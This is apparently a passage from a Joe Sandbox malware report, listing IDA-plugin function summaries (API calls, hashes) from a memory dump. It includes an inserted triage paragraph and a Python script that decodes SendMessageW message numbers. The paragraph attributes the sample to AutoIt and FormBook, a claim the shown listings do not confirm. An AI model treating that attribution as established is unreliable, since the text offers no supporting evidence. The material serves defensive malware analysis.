                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002048B3
                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002048D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window
                                                                                                    • String ID: SysMonthCal32
                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                    • Opcode ID: 9d06dbae1fcfb2c3e938c26760dd0bde4625c3b18b11507a015b54a9156360a8
                                                                                                    • Instruction ID: 294aa7633ab80abf2ae32bbbf2f4231d2fe635532db7a433676e26fb2d9efaa2
                                                                                                    • Opcode Fuzzy Hash: 9d06dbae1fcfb2c3e938c26760dd0bde4625c3b18b11507a015b54a9156360a8
                                                                                                    • Instruction Fuzzy Hash: 8A21D172610319BFDF159F90DC46FEA3B79EF88724F104214FA156B1D1D6B1A8618BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0020419F
                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002041AF
                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002041D5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                    • String ID: Listbox
                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                    • Opcode ID: 3f562222e23972364b5ad6d49300286eaf055a0cb0a9d5fbc4a4cff4c7ba42e3
                                                                                                    • Instruction ID: fe18c8abe81867a9344d49afbc1e9a70716e44beb12d0d7064f728e445eded14
                                                                                                    • Opcode Fuzzy Hash: 3f562222e23972364b5ad6d49300286eaf055a0cb0a9d5fbc4a4cff4c7ba42e3
                                                                                                    • Instruction Fuzzy Hash: 0721C272620319BBEF119F54DC85FAB776EEF99750F00C114FA089B1D1C671ACA287A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00204BAE
                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00204BC3
                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00204BD0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: msctls_trackbar32
                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                    • Opcode ID: 61a5a0cdfd711a82bccf26f0e665bd5d5221850c12c6535c235d130e4db311d4
                                                                                                    • Instruction ID: 62d402d6851219bc4182b007d2b9fa50a3239f4061044f23701cd54d9192792c
                                                                                                    • Opcode Fuzzy Hash: 61a5a0cdfd711a82bccf26f0e665bd5d5221850c12c6535c235d130e4db311d4
                                                                                                    • Instruction Fuzzy Hash: 92112371250308BEEF206E65CC06FAB7BA8EF85B18F014514FA54E20E1D671D8218B20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
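The three SendMessageW entries above (Listbox, SysMonthCal32 and msctls_trackbar32) only become readable once the message numbers are decoded: 0x180 and 0x186 are LB_ADDSTRING and LB_SETCURSEL, 0x1002 and 0x1009 are MCM_SETCURSEL and MCM_GETMINREQRECT, and 0x405, 0x406 and 0x414 are TBM_SETPOS, TBM_SETRANGE and TBM_SETTICFREQ, with lParam 0x00640000 on TBM_SETRANGE packing MAKELONG(0, 100). That is ordinary common-control setup, consistent with the GUI runtime of the AutoIt script the report's signatures flag rather than with the FormBook payload, so during triage these functions in the module dumped at 0x170000 can be set aside in favour of the injection and hooking code. The Python below is an added example, not Joe Sandbox's or its IDA plugin's code: it parses the plugin's "Api.Module(args), ref: addr" lines, decodes the messages and splits the packed range. The regular expression, the ApiCall record and the constant table are this example's own assumptions (the values are the documented Win32 ones, limited to the messages seen on this page); the sample input is copied from the msctls_trackbar32 entry above.

```python
"""Decode SendMessageW calls listed in a Joe Sandbox IDA-plugin function entry.

Added example for reading the report above; it is not Joe Sandbox's own code.
The regex follows the line shape printed by the plugin
("Api.Module(arg,...), ref: addr"); the constant table is an assumption
limited to the Win32 messages that occur in these entries.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

WM_USER = 0x0400      # base of the TBM_* trackbar messages
MCM_FIRST = 0x1000    # base of the MCM_* month-calendar messages

# Assumed mapping, restricted to the message numbers seen on this page.
MESSAGE_NAMES = {
    0x0180: "LB_ADDSTRING",
    0x0186: "LB_SETCURSEL",
    WM_USER + 5: "TBM_SETPOS",
    WM_USER + 6: "TBM_SETRANGE",
    WM_USER + 20: "TBM_SETTICFREQ",
    MCM_FIRST + 2: "MCM_SETCURSEL",
    MCM_FIRST + 9: "MCM_GETMINREQRECT",
}

# One API call line as printed by the plugin.  The argument list is optional
# because some lines (e.g. "GetWindowLongW.USER32 ref: 00204E26") carry none.
CALL_RE = re.compile(
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?\s*,?\s*ref:\s*([0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list = field(default_factory=list)
    ref: int = 0


def parse_calls(text: str) -> list:
    """Extract every 'Api.Module(args), ref: addr' line from a report entry."""
    calls = []
    for m in CALL_RE.finditer(text):
        raw = m.group(3)
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group(1), m.group(2), args, int(m.group(4), 16)))
    return calls


def _hex_arg(arg: str) -> Optional[int]:
    """The plugin prints '?' for unknown values and bare text for string args."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_send_message(call: ApiCall):
    """Return (message name, wParam, lParam) for a SendMessageW call, else None.

    TBM_SETRANGE packs MAKELONG(min, max) into lParam, so that one is split.
    """
    if call.api != "SendMessageW" or len(call.args) < 4:
        return None
    msg = _hex_arg(call.args[1])
    if msg is None:
        return None
    name = MESSAGE_NAMES.get(msg, f"0x{msg:04X}")
    wparam = _hex_arg(call.args[2])
    lparam = _hex_arg(call.args[3])
    if name == "TBM_SETRANGE" and lparam is not None:
        return (name, wparam, {"min": lparam & 0xFFFF, "max": lparam >> 16})
    return (name, wparam, lparam)


def decode_entry(text: str) -> list:
    """Decode all SendMessageW calls in one entry, keeping their ref addresses."""
    out = []
    for c in parse_calls(text):
        d = decode_send_message(c)
        if d is not None:
            out.append((c.ref, *d))
    return out


# Input copied from the msctls_trackbar32 entry of this report.
SAMPLE_ENTRY = """
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00204BAE
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00204BC3
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00204BD0
"""


if __name__ == "__main__":
    for ref, name, wp, lp in decode_entry(SAMPLE_ENTRY):
        print(f"{ref:08X}  {name:<18} wParam={wp} lParam={lp}")
```

Extending MESSAGE_NAMES with the rest of the LB_, MCM_ and TBM_ ranges lets the same decoder run over the whole function listing; entries whose only messages are control setup like these can be deprioritised, while SendMessageW calls with unrecognised or WM_COPYDATA-style message numbers deserve a closer look.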

                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00206220
                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0020624D
                                                                                                    • DrawMenuBar.USER32(?), ref: 0020625C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                    • Opcode ID: 8aa9c4512bd7e46df0ddb8ec273572342178211183b4ff9a7042cf5d5efb0837
                                                                                                    • Instruction ID: 8389cc425b0c78308d88acb4ee9f5346514ca8803678086517bd512868122b3f
                                                                                                    • Opcode Fuzzy Hash: 8aa9c4512bd7e46df0ddb8ec273572342178211183b4ff9a7042cf5d5efb0837
                                                                                                    • Instruction Fuzzy Hash: D6016931511318EFDB219F51DC88BAA7FB4FF48351F1480AAF849D6192DB708AA4EF21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 298ae986d6758492fedbceeea6f93812f449149b70276587c1d77128a90bd1b4
                                                                                                    • Instruction ID: e21aa6b5686132d4b97d554a65fe2d855c96ad0cb3acec2fe05d268eaeca245c
                                                                                                    • Opcode Fuzzy Hash: 298ae986d6758492fedbceeea6f93812f449149b70276587c1d77128a90bd1b4
                                                                                                    • Instruction Fuzzy Hash: B7C15A75A0020AEFDB15CFA4C894BAAB7B5FF48704F11859AE505EB351D731EE81CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                                    • Instruction ID: 5d10387cdb3386f3f2b47d15122336c7767f2d1cf96afc0e583403a9d38d5986
                                                                                                    • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                                    • Instruction Fuzzy Hash: 83A1497AA003969FDB25CF58C8917BEBBE4EFAA310F18416DE5859B241C3B48D41C750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00210BD4,?), ref: 001D0E80
                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00210BD4,?), ref: 001D0E98
                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0020DCE0,000000FF,?,00000000,00000800,00000000,?,00210BD4,?), ref: 001D0EBD
                                                                                                    • _memcmp.LIBVCRUNTIME ref: 001D0EDE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 314563124-0
                                                                                                    • Opcode ID: 2978c1dce115e25b5f32946abb753eedd2baec30f417f5c776c4751e00e15f25
                                                                                                    • Instruction ID: 09d95045161d0e9f56d731f09bc3cc0340513975204184bd4dc7d9410d122299
                                                                                                    • Opcode Fuzzy Hash: 2978c1dce115e25b5f32946abb753eedd2baec30f417f5c776c4751e00e15f25
                                                                                                    • Instruction Fuzzy Hash: 5E810971A00209EFCB05DFD4C984EEEB7B9FF89315F204599E506AB250DB71AE46CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 001F245A
                                                                                                    • WSAGetLastError.WSOCK32 ref: 001F2468
                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001F24E7
                                                                                                    • WSAGetLastError.WSOCK32 ref: 001F24F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$socket
                                                                                                    • String ID:
                                                                                                    • API String ID: 1881357543-0
                                                                                                    • Opcode ID: 4313dce0d3f4d2fb399a7c51287da911464d767e58fa08b63997a992ada73127
                                                                                                    • Instruction ID: 5c95e96ce26a143c7d2cab14cf62ab8590369bceb95dc1f048262850c979468b
                                                                                                    • Opcode Fuzzy Hash: 4313dce0d3f4d2fb399a7c51287da911464d767e58fa08b63997a992ada73127
                                                                                                    • Instruction Fuzzy Hash: 0B41B375600200AFE720AF24C896F7A77E5AB14718F54C488FA199F2D3D772ED42CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00206C41
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00206C74
                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00206CE1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3880355969-0
                                                                                                    • Opcode ID: 9dc5f4593c4667930eb4815c8f89829fedc4a5e5a97508d52372fbb5d15cefba
                                                                                                    • Instruction ID: c85aafbc3e6e35542ac88c3bfc0319ae1b3b0a3b5cc1896c1eb716d5d0e0b925
                                                                                                    • Opcode Fuzzy Hash: 9dc5f4593c4667930eb4815c8f89829fedc4a5e5a97508d52372fbb5d15cefba
                                                                                                    • Instruction Fuzzy Hash: A1516174A10209EFDF14CF54D9889AE7BB5FF45360F208159F8659B2A1D730EDA1CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001E60DD
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 001E6103
                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001E6128
                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001E6154
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3321077145-0
                                                                                                    • Opcode ID: 41e2a800184c73074952503037766e333785f33ae89a28f1a131e26175e5c952
                                                                                                    • Instruction ID: b78ad3c09e591c99e04b085c0613385ab5ff88b39abdedf1ccef64410e897bae
                                                                                                    • Opcode Fuzzy Hash: 41e2a800184c73074952503037766e333785f33ae89a28f1a131e26175e5c952
                                                                                                    • Instruction Fuzzy Hash: BA414E39600650DFCB11EF15C458A5EBBF2EFA9754B19C488E84A9B362CB30FD41CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32 ref: 0020204A
                                                                                                      • Part of subcall function 001D42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 001D42E6
                                                                                                      • Part of subcall function 001D42CC: GetCurrentThreadId.KERNEL32 ref: 001D42ED
                                                                                                      • Part of subcall function 001D42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001D2E43), ref: 001D42F4
                                                                                                    • GetCaretPos.USER32(?), ref: 0020205E
                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 002020AB
                                                                                                    • GetForegroundWindow.USER32 ref: 002020B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2759813231-0
                                                                                                    • Opcode ID: 810a053dd438816871e9025118ffe27c01ad60321ce720314750d882c52c921c
                                                                                                    • Instruction ID: 28017be116ce4f99aeb25b80a165086d661804be7dc8bcc762d689a6416af20c
                                                                                                    • Opcode Fuzzy Hash: 810a053dd438816871e9025118ffe27c01ad60321ce720314750d882c52c921c
                                                                                                    • Instruction Fuzzy Hash: 7E314371D00209AFC704EFA6C885CAEB7F9EF58304B1084AAE419E7252D771DE05CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 00174154: _wcslen.LIBCMT ref: 00174159
                                                                                                    • _wcslen.LIBCMT ref: 001DE7F7
                                                                                                    • _wcslen.LIBCMT ref: 001DE80E
                                                                                                    • _wcslen.LIBCMT ref: 001DE839
                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 001DE844
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                                                    • String ID:
                                                                                                    • API String ID: 3763101759-0
                                                                                                    • Opcode ID: a21f4f5d6db58abb952c6e030649a3b921fa13def5c62b0d8c590a29d0931c75
                                                                                                    • Instruction ID: 081372788e4bea61641d3c0aec3b217df5e57de1e7542d0b2ecf3dcafac6a282
                                                                                                    • Opcode Fuzzy Hash: a21f4f5d6db58abb952c6e030649a3b921fa13def5c62b0d8c590a29d0931c75
                                                                                                    • Instruction Fuzzy Hash: FD218171D00214AFDB11EFA8D981BAEB7F8EF55760F1440A5E904AF385D7709E418BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 001D960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,001D8199,?,000000FF,?,001D8FE3,00000000,?,0000001C,?,?), ref: 001D961B
                                                                                                      • Part of subcall function 001D960C: lstrcpyW.KERNEL32(00000000,?), ref: 001D9641
                                                                                                      • Part of subcall function 001D960C: lstrcmpiW.KERNEL32(00000000,?,001D8199,?,000000FF,?,001D8FE3,00000000,?,0000001C,?,?), ref: 001D9672
                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001D8FE3,00000000,?,0000001C,?,?,00000000), ref: 001D81B2
                                                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 001D81D8
                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,001D8FE3,00000000,?,0000001C,?,?,00000000), ref: 001D8213
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                    • String ID: cdecl
                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                    • Opcode ID: 0f4a3ee63776405ce16c5fd01fa1bca3698cd5e19b5249e9dd8231f889e20adf
                                                                                                    • Instruction ID: c5077bf9ab12c9c7eba82e98fc7aa687966b2cfb613e6b228d238fe0a5aa3b74
                                                                                                    • Opcode Fuzzy Hash: 0f4a3ee63776405ce16c5fd01fa1bca3698cd5e19b5249e9dd8231f889e20adf
                                                                                                    • Instruction Fuzzy Hash: EE11D37A200351ABCB156F78D849A7A77B9FF99750B50402AF906CB390EF31D811C790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0020866A
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00208689
                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002086A1
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001EC10A,00000000), ref: 002086CA
                                                                                                      • Part of subcall function 00172441: GetWindowLongW.USER32(00000000,000000EB), ref: 00172452
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
